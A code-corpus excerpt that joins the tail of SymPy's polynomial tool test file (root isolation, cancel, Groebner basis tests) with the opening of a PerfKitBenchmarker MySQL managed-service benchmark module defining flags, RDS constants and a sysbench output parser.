[g, h], sup=S(7)/5) == [((-2, -1), {0: 2}), ((1, 1), {1: 1})]
assert intervals([x + 2, x**2 - 2]) == \
[((-2, -2), {0: 1}), ((-2, -1), {1: 1}), ((1, 2), {1: 1})]
assert intervals([x + 2, x**2 - 2], strict=True) == \
[((-2, -2), {0: 1}), ((-S(3)/2, -1), {1: 1}), ((1, 2), {1: 1})]
f = 7*z**4 - 19*z**3 + 20*z**2 + 17*z + 20
assert intervals(f) == []
real_part, complex_part = intervals(f, all=True, sqf=True)
assert real_part == []
assert all(re(a) < re(r) < re(b) and im(
a) < im(r) < im(b) for (a, b), r in zip(complex_part, nroots(f)))
assert complex_part == [(-S(40)/7 - 40*I/7, 0), (-S(40)/7, 40*I/7),
(-40*I/7, S(40)/7), (0, S(40)/7 + 40*I/7)]
real_part, complex_part = intervals(f, all=True, sqf=True, eps=S(1)/10)
assert real_part == []
assert all(re(a) < re(r) < re(b) and im(
a) < im(r) < im(b) for (a, b), r in zip(complex_part, nroots(f)))
raises(ValueError, lambda: intervals(x**2 - 2, eps=10**-100000))
raises(ValueError, lambda: Poly(x**2 - 2).intervals(eps=10**-100000))
raises(
ValueError, lambda: intervals([x**2 - 2, x**2 - 3], eps=10**-100000))
def test_refine_root():
f = Poly(x**2 - 2)
assert f.refine_root(1, 2, steps=0) == (1, 2)
assert f.refine_root(-2, -1, steps=0) == (-2, -1)
assert f.refine_root(1, 2, steps=None) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=None) == (-S(3)/2, -1)
assert f.refine_root(1, 2, steps=1) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=1) == (-S(3)/2, -1)
assert f.refine_root(1, 2, steps=1, fast=True) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=1, fast=True) == (-S(3)/2, -1)
assert f.refine_root(1, 2, eps=S(1)/100) == (S(24)/17, S(17)/12)
assert f.refine_root(1, 2, eps=1e-2) == (S(24)/17, S(17)/12)
raises(PolynomialError, lambda: (f**2).refine_root(1, 2, check_sqf=True))
raises(RefinementFailed, lambda: (f**2).refine_root(1, 2))
raises(RefinementFailed, lambda: (f**2).refine_root(2, 3))
f = x**2 - 2
assert refine_root(f, 1, 2, steps=1) == (1, S(3)/2)
assert refine_root(f, -2, -1, steps=1) == (-S(3)/2, -1)
assert refine_root(f, 1, 2, steps=1, fast=True) == (1, S(3)/2)
assert refine_root(f, -2, -1, steps=1, fast=True) == (-S(3)/2, -1)
assert refine_root(f, 1, 2, eps=S(1)/100) == (S(24)/17, S(17)/12)
assert refine_root(f, 1, 2, eps=1e-2) == (S(24)/17, S(17)/12)
raises(PolynomialError, lambda: refine_root(1, 7, 8, eps=S(1)/100))
raises(ValueError, lambda: Poly(f).refine_root(1, 2, eps=10**-100000))
raises(ValueError, lambda: refine_root(f, 1, 2, eps=10**-100000))
def test_count_roots():
assert count_roots(x**2 - 2) == 2
assert count_roots(x**2 - 2, inf=-oo) == 2
assert count_roots(x**2 - 2, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-oo, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-2) == 2
assert count_roots(x**2 - 2, inf=-1) == 1
assert count_roots(x**2 - 2, sup=1) == 1
assert count_roots(x**2 - 2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 + 2) == 0
assert count_roots(x**2 + 2, inf=-2*I) == 2
assert count_roots(x**2 + 2, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=-2*I, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=0) == 0
assert count_roots(x**2 + 2, sup=0) == 0
assert count_roots(x**2 + 2, inf=-I) == 1
assert count_roots(x**2 + 2, sup=+I) == 1
assert count_roots(x**2 + 2, inf=+I/2, sup=+I) == 0
assert count_roots(x**2 + 2, inf=-I, sup=-I/2) == 0
raises(PolynomialError, lambda: count_roots(1))
def test_Poly_root():
f = Poly(2*x**3 - 7*x**2 + 4*x + 4)
assert f.root(0) == -S(1)/2
assert f.root(1) == 2
assert f.root(2) == 2
raises(IndexError, lambda: f.root(3))
assert Poly(x**5 + x + 1).root(0) == RootOf(x**3 - x**2 + 1, 0)
def test_real_roots():
assert real_roots(x) == [0]
assert real_roots(x, multiple=False) == [(0, 1)]
assert real_roots(x**3) == [0, 0, 0]
assert real_roots(x**3, multiple=False) == [(0, 3)]
assert real_roots(x*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0]
assert real_roots(x*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 1)]
assert real_roots(
x**3*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0, 0, 0]
assert real_roots(x**3*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 3)]
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert Poly(f).real_roots() == [-S(1)/2, 2, 2]
assert Poly(g).real_roots() == [RootOf(g, 0)]
def test_all_roots():
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert Poly(f).all_roots() == [-S(1)/2, 2, 2]
assert Poly(g).all_roots() == [RootOf(g, 0), RootOf(g, 1), RootOf(g, 2)]
def test_nroots():
assert Poly(0, x).nroots() == []
assert Poly(1, x).nroots() == []
assert Poly(x**2 - 1, x).nroots() == [-1.0, 1.0]
assert Poly(x**2 + 1, x).nroots() == [-1.0*I, 1.0*I]
roots = Poly(x**2 - 1, x).nroots()
assert roots == [-1.0, 1.0]
roots = Poly(x**2 + 1, x).nroots()
assert roots == [-1.0*I, 1.0*I]
roots = Poly(x**2/3 - S(1)/3, x).nroots()
assert roots == [-1.0, 1.0]
roots = Poly(x**2/3 + S(1)/3, x).nroots()
assert roots == [-1.0*I, 1.0*I]
assert Poly(x**2 + 2*I, x).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert Poly(
x**2 + 2*I, x, extension=I).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert Poly(0.2*x + 0.1).nroots() == [-0.5]
roots = nroots(x**5 + x + 1, n=5)
eps = Float("1e-5")
assert re(roots[0]).epsilon_eq(-0.75487, eps) is S.true
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.true
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.true
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.true
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.true
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.true
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.true
eps = Float("1e-6")
assert re(roots[0]).epsilon_eq(-0.75487, eps) is S.false
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.false
raises(DomainError, lambda: Poly(x + y, x).nroots())
raises(MultivariatePolynomialError, lambda: Poly(x + y).nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
raises(PolynomialError, lambda: nroots(0))
# issue 8296
f = Poly(x**4 - 1)
assert f.nroots(2) == [w.n(2) for w in f.all_roots()]
def test_ground_roots():
f = x**6 - 4*x**4 + 4*x**3 - x**2
assert Poly(f).ground_roots() == {S(1): 2, S(0): 2}
assert ground_roots(f) == {S(1): 2, S(0): 2}
def test_nth_power_roots_poly():
f = x**4 - x**2 + 1
f_2 = (x**2 - x + 1)**2
f_3 = (x**2 + 1)**2
f_4 = (x**2 + x + 1)**2
f_12 = (x - 1)**4
assert nth_power_roots_poly(f, 1) == f
raises(ValueError, lambda: nth_power_roots_poly(f, 0))
raises(ValueError, lambda: nth_power_roots_poly(f, x))
assert factor(nth_power_roots_poly(f, 2)) == f_2
assert factor(nth_power_roots_poly(f, 3)) == f_3
assert factor(nth_power_roots_poly(f, 4)) == f_4
assert factor(nth_power_roots_poly(f, 12)) == f_12
raises(MultivariatePolynomialError, lambda: nth_power_roots_poly(
x + y, 2, x, y))
def test_torational_factor_list():
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + sqrt(2))}))
assert _torational_factor_list(p, x) == (-2, [
(-x*(1 + sqrt(2))/2 + 1, 1),
(-x*(1 + sqrt(2)) - 1, 1),
(-x*(1 + sqrt(2)) + 1, 1)])
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + 2**Rational(1, 4))}))
assert _torational_factor_list(p, x) is None
def test_cancel():
assert cancel(0) == 0
assert cancel(7) == 7
assert cancel(x) == x
assert cancel(oo) == oo
assert cancel((2, 3)) == (1, 2, 3)
assert cancel((1, 0), x) == (1, 1, 0)
assert cancel((0, 1), x) == (1, 0, 1)
f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, 1
F, G, P, Q = [ Poly(u, x) for u in (f, g, p, q) ]
assert F.cancel(G) == (1, P, Q)
assert cancel((f, g)) == (1, p, q)
assert cancel((f, g), x) == (1, p, q)
assert cancel((f, g), (x,)) == (1, p, q)
assert cancel((F, G)) == (1, P, Q)
assert cancel((f, g), polys=True) == (1, P, Q)
assert cancel((F, G), polys=False) == (1, p, q)
f = (x**2 - 2)/(x + sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x - sqrt(2)
f = (x**2 - 2)/(x - sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x + sqrt(2)
assert cancel((x**2/4 - 1, x/2 - 1)) == (S(1)/2, x + 2, 1)
assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
assert cancel((x**2 - y**2)/(x - y), x) == x + y
assert cancel((x**2 - y**2)/(x - y), y) == x + y
assert cancel((x**2 - y**2)/(x - y)) == x + y
assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
assert cancel((x**3/2 - S(1)/2)/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
f = Poly(x**2 - a**2, x)
g = Poly(x - a, x)
F = Poly(x + a, x)
G = Poly(1, x)
assert cancel((f, g)) == (1, F, G)
f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
g = x**2 - 2
assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
f = Poly(-2*x + 3, x)
g = Poly(-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1, x)
assert cancel((f, g)) == (1, -f, -g)
f = Poly(y, y, domain='ZZ(x)')
g = Poly(1, y, domain='ZZ[x]')
assert f.cancel(
g) == (1, Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
assert f.cancel(g, include=True) == (
Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
f = Poly(5*x*y + x, y, domain='ZZ(x)')
g = Poly(2*x**2*y, y, domain='ZZ(x)')
assert f.cancel(g, include=True) == (
Poly(5*y + 1, y, domain='ZZ(x)'), Poly(2*x*y, y, domain='ZZ(x)'))
f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
assert cancel(f).is_Mul == True
P = tanh(x - 3.0)
Q = tanh(x + 3.0)
f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
+ (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**(S(3)/2))
assert cancel(f).is_Mul == True
# issue 7022
A = Symbol('A', commutative=False)
p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
assert cancel(p1) == p2
assert cancel(2*p1) == 2*p2
assert cancel(1 + p1) == 1 + p2
assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p4 = Piecewise(((x - 1), x > 1), (1/x, True))
assert cancel(p3) == p4
assert cancel(2*p3) == 2*p4
assert cancel(1 + p3) == 1 + p4
assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
# issue 9363
M = MatrixSymbol('M', 5, 5)
assert cancel(M[0,0] + 7) == M[0,0] + 7
expr = sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2] / z
assert cancel(expr) == expr
def test_reduced():
f = 2*x**4 + y**2 - x**2 + y**3
G = [x**3 - x, y**3 - y]
Q = [2*x, 1]
r = x**2 + y**2 + y
assert reduced(f, G) == (Q, r)
assert reduced(f, G, x, y) == (Q, r)
H = groebner(G)
assert H.reduce(f) == (Q, r)
Q = [Poly(2*x, x, y), Poly(1, x, y)]
r = Poly(x**2 + y**2 + y, x, y)
assert _strict_eq(reduced(f, G, polys=True), (Q, r))
assert _strict_eq(reduced(f, G, x, y, polys=True), (Q, r))
H = groebner(G, polys=True)
assert _strict_eq(H.reduce(f), (Q, r))
f = 2*x**3 + y**3 + 3*y
G = groebner([x**2 + y**2 - 1, x*y - 2])
Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
r = 0
assert reduced(f, G) == (Q, r)
assert G.reduce(f) == (Q, r)
assert reduced(f, G, auto=False)[1] != 0
assert G.reduce(f, auto=False)[1] != 0
assert G.contains(f) is True
assert G.contains(f + 1) is False
assert reduced(1, [1], x) == ([1], 0)
raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
assert groebner([], x, y, z) == []
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
[Poly(1 + x**2, x, y), Poly(-1 + y**4, x, y)]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
[Poly(-1 + y**4, x, y, z), Poly(z**3, x, y, z), Poly(1 + x**2, x, y, z)]
assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
assert groebner([Eq(x**3, 1), Eq(x**2, 1)]) == [x - 1]
F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
G = groebner(F, x, y, z, modulus=7, symmetric=False)
assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
Q, r = reduced(f, G, x, y, z, modulus=7, symmetric=False, polys=True)
assert sum([ q*g for q, g in zip(Q, G.polys)], r) == Poly(f, modulus=7)
F = [x*y - 2*y, 2*y**2 - x**2]
assert groebner(F, x, y, order='grevlex') == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner(F, y, x, order='grevlex') == \
[x**3 - 2*x**2, -x**2 + 2*y**2, x*y - 2*y]
assert groebner(F, order='grevlex', field=True) == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner([1], x) == [1]
assert groebner([x**2 + 2.0*y], x, y) == [1.0*x**2 + 2.0*y]
raises(ComputationFailed, lambda: groebner([1]))
assert groebner([x**2 - 1, x**3 + 1], method='buchberger') == [x + 1]
assert groebner([x**2 - 1, x**3 + 1], method='f5b') == [x + 1]
raises(ValueError, lambda: groebner([x, y], method='unknown'))
def test_fglm():
F = [a + b + c + d, a*b + a*d + b*c + b*d, a*b*c + a*b*d + a*c*d + b*c*d, a*b*c*d - 1]
G = groebner(F, a, b, c, d, order=grlex)
B = [
4*a + 3*d**9 - 4*d**5 - 3*d,
4*b + 4*c - 3*d**9 + 4*d**5 + 7*d,
4*c**2 + 3*d**10 - 4*d**6 - 3*d**2,
4*c*d**4 + 4*c - d**9 + 4*d**5 + 5*d,
d**12 - d**8 - d**4 + 1,
]
assert groebner(F, a, b, c, d, order=lex) == B
assert G.fglm(lex) == B
F = [9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
-72*t*x**7 - 252*t*x**6 + 192*t*x**5 + 1260*t*x**4 + 312*t*x**3 - 404*t*x**2 - 576*t*x + \
108*t - 72*x**7 - 256*x**6 + 192*x**5 + 1280*x**4 + 312*x**3 - 576*x + 96]
G = groebner(F, t, x, order=grlex)
B = [
203577793572507451707*t + 627982239411707112*x**7 - 666924143779443762*x**6 - \
10874593056632447619*x**5 + 5119998792707079562*x**4 + 72917161949456066376*x**3 + \
20362663855832380362*x**2 - 142079311455258371571*x + 183756699868981873194,
9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
]
assert groebner(F, t, x, order=lex) == B
assert G.fglm(lex) == B
F = [x**2 - x - 3*y + 1, -2*x + y**2 + y - 1]
G = groebner(F, x, y, order=lex)
B = [
x**2 - x - 3*y + 1,
y**2 - 2*x + y - 1,
]
assert groebner(F, x, y, order=grlex) == B
assert G.fglm(grlex) == B
def test_is_zero_dimensional():
assert is_zero_dimensional([x, y], x, y) is True
assert is_zero_dimensional([x**3 + y**2], x, y) is False
assert is_zero_dimensional([x, y, z], x, y, z) is True
assert is_zero_dimensional([x, y, z], x, y, z, t) is False
F = [x*y - z, y*z - x, x*y - y]
assert is_zero_dimensional(F, x, y, z) is True
F = [x**2 - 2*x*z + 5, x*y**2 + y*z**3, 3*y**2 - 8*z**2]
assert is_zero_dimensional(F, x, y, z) is True
def test_GroebnerBasis():
F = [x*y - 2*y, 2*y**2 - x**2]
G = groebner(F, x, y, order='grevlex')
H = [y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
P = [ Poly(h, x, y) for h in H ]
assert isinstance(G, GroebnerBasis) is True
assert len(G) == 3
assert G[0] == H[0] and not G[0].is_Poly
assert G[1] == H[1] and not G[1].is_Poly
assert G[2] == H[2] and not G[2].is_Poly
assert G[1:] == H[1:] and not any(g.is_Poly for g in G[1:])
assert G[:2] == H[:2] and not any(g.is_Poly for g in G[1:])
assert G.exprs == H
assert G.polys == P
assert G.gens == (x, y)
assert G.domain == ZZ
assert G.order == grevlex
assert G == H
assert G == tuple(H)
assert G == P
assert G == tuple(P)
assert G != []
G = groebner(F, x, y, order='grevlex', polys=True)
assert G[0] == P[0] and G[0].is_Poly
assert G[1] == P[1] and G[1].is_Poly
assert G[2] == P[2] and G[2].is_Poly
assert G[1:] == P[1:] and all(g.is_Poly for g in G[1:])
assert G[:2] == P[:2] and all(g.is_Poly for g in G[1:])
def test_poly():
assert poly(x) == Poly(x, x)
assert poly(y) == Poly(y, y)
assert poly(x + y) == Poly(x + y, x, y)
assert poly(x + sin(x)) == Poly(x + sin(x), x, sin(x))
assert poly(x + y, wrt=y) == Poly(x + y, y, x)
assert poly(x + sin(x), wrt=sin(x)) == Poly(x + sin(x), sin(x), x)
assert poly(x*y + 2*x*z**2 + 17) == Poly(x*y + 2*x*z**2 + 17, x, y, z)
assert poly(2*(y + z)**2 - 1) == Poly(2*y**2 + 4*y*z + 2*z**2 - 1, y, z)
assert poly(
x*(y + z)**2 - 1) == Poly(x*y**2 + 2*x*y*z + x*z**2 - 1, x, y, z)
assert poly(2*x*(
y + z)**2 - 1) == Poly(2*x*y**2 + 4*x*y*z + 2*x*z**2 - 1, x, y, z)
assert poly(2*(
y + z)**2 - x - 1) == Poly(2*y**2 + 4*y*z + 2*z**2 - x - 1, x, y, z)
assert poly(x*(
y + z)**2 - x - 1) == Poly(x*y**2 + 2*x*y*z + x*z**2 - x - 1, x, y, z)
assert poly(2*x*(y + z)**2 - x - 1) == Poly(2*x*y**2 + 4*x*y*z + 2*
x*z**2 - x - 1, x, y, z)
assert poly(x*y + (x + y)**2 + (x + z)**2) == \
Poly(2*x*z + 3*x*y + y**2 + z**2 + 2*x**2, x, y, z)
assert poly(x*y*(x + y)*(x + z)**2) == \
Poly(x**3*y**2 + x*y**2*z**2 + y*x**2*z**2 + 2*z*x**2*
y**2 + 2*y*z*x**3 + y*x**4, x, y, z)
assert poly(Poly(x + y + z, y, x, z)) == Poly(x + y + z, y, x, z)
assert poly((x + y)**2, x) == Poly(x**2 + 2*x*y + y**2, x, domain=ZZ[y])
assert poly((x + y)**2, y) == Poly(x**2 + 2*x*y + y**2, y, domain=ZZ[x])
assert poly(1, x) == Poly(1, x)
raises(GeneratorsNeeded, lambda: poly(1))
# issue 6184
assert poly(x + y, x, y) == Poly(x + y, x, y)
assert poly(x + y, y, x) == Poly(x + y, y, x)
def test_keep_coeff():
u = Mul(2, x + 1, evaluate=False)
assert _keep_coeff(S(1), x) == x
assert _keep_coeff(S(-1), x) == -x
assert _keep_coeff(S(1.0), x) == 1.0*x
assert _keep_coeff(S(-1.0), x) == -1.0*x
assert _keep_coeff(S(1), 2*x) == 2*x
assert _keep_coeff(S(2), x/2) == x
assert _keep_coeff(S(2), sin(x)) == 2*sin(x)
assert _keep_coeff(S(2), x + 1) == u
assert _keep_coeff(x, 1/x) == 1
assert _keep_coeff(x + 1, S(2)) == u
@XFAIL
def test_poly_matching_consistency():
# Test for this issue:
# https://github.com/sympy/sympy/issues/5514
assert I * Poly(x, x) == Poly(I*x, x)
assert Poly(x, x) * I == Poly(I*x, x)
@XFAIL
def test_issue_5786():
assert expand(factor(expand(
(x - I*y)*(z - I*t)), extension=[I])) == -I*t*x - t*y + x*z - I*y*z
def test_noncommutative():
class foo(Expr):
is_commutative=False
e = x/(x + x*y)
c = 1/( 1 + y)
assert cancel(foo(e)) == foo(c)
assert cancel(e + foo(e)) == c + foo(c)
assert cancel(e*foo(c)) == c*foo(c)
def test_to_rational_coeffs():
assert to_rational_coeffs(
Poly(x**3 + y*x**2 + sqrt(y), x, domain='EX')) == None
| abloomston/sympy | sympy/polys/tests/test_polytools.py | Python | bsd-3-clause | 106,107 | 0.001301 |
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MySQL Service Benchmarks.
This is a set of benchmarks that measures the performance of MySQL databases on
managed MySQL services.
- On AWS, we will use RDS+MySQL.
- On GCP, we will use Cloud SQL v2 (Performance Edition). As of July 2015, you
will need to request to whitelist your GCP project to get access to Cloud SQL
v2. Follow instructions on your GCP's project console to do that.
As other cloud providers deliver managed MySQL services, we will add them here.
"""
import json
import logging
import re
import StringIO
import time
import uuid
from perfkitbenchmarker import benchmark_spec as benchmark_spec_class
from perfkitbenchmarker import configs
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import aws_network
from perfkitbenchmarker.providers.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_enum(
'mysql_svc_db_instance_cores', '4', ['1', '4', '8', '16'],
'The number of cores to be provisioned for the DB instance.')
flags.DEFINE_integer('mysql_svc_oltp_tables_count', 4,
'The number of tables used in sysbench oltp.lua tests')
flags.DEFINE_integer('mysql_svc_oltp_table_size', 100000,
'The number of rows of each table used in the oltp tests')
flags.DEFINE_integer('sysbench_warmup_seconds', 120,
'The duration of the warmup run in which results are '
'discarded, in seconds.')
flags.DEFINE_integer('sysbench_run_seconds', 480,
'The duration of the actual run in which results are '
'collected, in seconds.')
flags.DEFINE_integer('sysbench_thread_count', 16,
'The number of test threads on the client side.')
flags.DEFINE_integer('sysbench_latency_percentile', 99,
'The latency percentile we ask sysbench to compute.')
flags.DEFINE_integer('sysbench_report_interval', 2,
'The interval, in seconds, we ask sysbench to report '
'results.')
BENCHMARK_NAME = 'mysql_service'
BENCHMARK_CONFIG = """
mysql_service:
description: MySQL service benchmarks.
vm_groups:
default:
vm_spec: *default_single_core
"""
# Query DB creation status once every 15 seconds
DB_STATUS_QUERY_INTERVAL = 15
# How many times we will wait for the service to create the DB
# total wait time is therefore: "query interval * query limit"
DB_STATUS_QUERY_LIMIT = 200
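# (With the values above, that is 15 s * 200 = 3,000 s, i.e. up to 50 minutes of
# waiting before the benchmark gives up.)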
# Map from FLAGs.mysql_svc_db_instance_cores to RDS DB Type
RDS_CORE_TO_DB_CLASS_MAP = {
'1': 'db.m3.medium',
'4': 'db.m3.xlarge',
'8': 'db.m3.2xlarge',
'16': 'db.r3.4xlarge', # m3 series doesn't have 16 core.
}
RDS_DB_ENGINE = 'MySQL'
RDS_DB_ENGINE_VERSION = '5.6.23'
RDS_DB_STORAGE_TYPE_GP2 = 'gp2'
# Storage IOPS capacity of the DB instance.
# Currently this is fixed because the cloud provider GCP does not support
# changing this setting. As soon as it supports changing the storage size, we
# will expose a flag here to allow caller to select a storage size.
# Default GCP storage size is 1TB PD-SSD which supports 10K Read or 15K Write
# IOPS (12.5K mixed).
# To support 12.5K IOPS on EBS-GP, we need 4170 GB disk.
RDS_DB_STORAGE_GP2_SIZE = '4170'
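# Rough sizing sketch behind the number above, assuming gp2's baseline of about
# 3 IOPS per GB: 12,500 IOPS / 3 IOPS-per-GB ~= 4,167 GB, rounded up to 4170.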
# A list of status strings that are possible during RDS DB creation.
RDS_DB_CREATION_PENDING_STATUS = frozenset(
['creating', 'modifying', 'backing-up', 'rebooting'])
# Constants defined for Sysbench tests.
RAND_INIT_ON = 'on'
DISABLE = 'disable'
UNIFORM = 'uniform'
OFF = 'off'
MYSQL_ROOT_USER = 'root'
MYSQL_ROOT_PASSWORD_PREFIX = 'Perfkit8'
MYSQL_PORT = '3306'
NORMAL_SYSBENCH_PATH_PREFIX = '/usr'
PREPARE_SCRIPT_PATH = '/share/doc/sysbench/tests/db/parallel_prepare.lua'
OLTP_SCRIPT_PATH = '/share/doc/sysbench/tests/db/oltp.lua'
SYSBENCH_RESULT_NAME_DATA_LOAD = 'sysbench data load time'
SYSBENCH_RESULT_NAME_TPS = 'sysbench tps'
SYSBENCH_RESULT_NAME_LATENCY = 'sysbench latency'
NA_UNIT = 'NA'
SECONDS_UNIT = 'seconds'
MS_UNIT = 'milliseconds'
# These are the constants that should be specified in GCP's cloud SQL command.
DEFAULT_BACKUP_START_TIME = '07:00'
GCP_MY_SQL_VERSION = 'MYSQL_5_6'
GCP_PRICING_PLAN = 'PACKAGE'
RESPONSE_TIME_TOKENS = ['min', 'avg', 'max', 'percentile']
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
class DBStatusQueryError(Exception):
pass
def _GenerateRandomPassword():
""" Generates a random password to be used by the DB instance.
Args:
None
Returns:
A string that can be used as password to a DB instance.
"""
return '%s%s' % (MYSQL_ROOT_PASSWORD_PREFIX, str(uuid.uuid4())[-8:])
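# For reference, generated passwords have the form '<prefix><last 8 uuid chars>',
# e.g. something like 'Perfkit83a4b5c6d' (illustrative value only).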
def ParseSysbenchOutput(sysbench_output, results, metadata):
"""Parses sysbench output.
Extract relevant TPS and latency numbers, and populate the final result
  collection with this information.
Specifically, we are interested in tps numbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
